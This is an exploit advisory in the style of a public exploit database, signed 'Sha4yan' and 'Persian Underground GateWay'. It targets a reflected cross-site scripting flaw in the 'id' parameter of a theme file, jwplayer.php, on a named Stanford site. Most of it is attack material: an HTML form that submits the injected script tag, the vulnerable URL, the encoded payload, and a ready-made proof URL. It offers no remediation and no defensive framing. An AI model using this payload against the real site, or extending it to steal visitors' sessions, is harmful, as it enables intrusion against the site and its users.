/*********************************************************************************** ** Exploit Title: Stanford Wordpress Template Cross Site Scripting Vulnerability ** ** Exploit Author: Sha4yan ** ** Vendor Homepage : http://stvp.stanford.edu/ ** ** Google Dork: none ** ** Date: 2016-01-01 ** ** Tested on: Ubuntu / Mozila Firefox ** ************************************************************************************ ** Exploit Code: ****************** <html xmlns="http://www.w3.org/1999/xhtml"> <body> <form method="POST" action="http://stvp.stanford.edu/wp-content/themes/stvp/jwplayer.php?id=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E"> <input type="submit" value="Exploit@Sha4yan"/> </form> </body> </html> ************************************************************************************ Location & Vulnerable query: ****************** http://stvp.stanford.edu/wp-content/themes/stvp/jwplayer.php?id= Add This : %22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E ************************************************************************************* ** Proof: ****************** Executable script tag in Stanford's own page: Exploit : "><script>alert(/xss/)</script> Exploit query: http://stvp.stanford.edu/wp-content/themes/stvp/jwplayer.php?id=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E ****************************************************************************************** ** Persian Underground GateWay ******************************************************************************************